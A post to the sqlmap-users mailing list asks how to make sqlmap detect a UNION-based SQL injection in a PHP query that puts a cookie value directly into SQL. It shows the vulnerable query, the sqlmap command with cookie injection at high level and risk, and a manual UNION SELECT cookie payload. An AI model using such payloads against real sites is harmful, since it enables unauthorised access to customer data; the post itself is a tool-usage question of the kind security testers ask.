Hi all,
Trying to do a (simple) injection with sqlmap, and I can't seem to coax it
into getting it right.
The PHP source looks something like:
$res = mysql_query("SELECT userid, custname, custemail, owing FROM custdata
AS cd WHERE cd.userid = (SELECT userid FROM ccc_users AS cu WHERE sessionid
= '$_COOKIE['sesh']')");
and then it displays the fields it pulled out.
The command(s) I've tried look something like ./sqlmap.py -u
site.com/script.php --cookie="sesh=1" --cookie-urlencode --level=5
--risk=5. However, the only injection point it finds is AND/OR time-based
blind, which is horribly slow. Of course, manually, I can do a
sesh=')%20UNION%20select%201,2,3,4%20--%20 or similar, so
I'm definitely able to pull out results.
Anything I can do to push sqlmap in the right direction?
Thanks,
ss23
------------------------------------------------------------------------------
Got visibility?
Most devs has no idea what their production app looks like.
Find out how fast your code is with AppDynamics Lite.
http://ad.doubleclick.net/clk;262219671;13503038;y?
http://info.appdynamics.com/FreeJavaPerformanceDownload.html
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
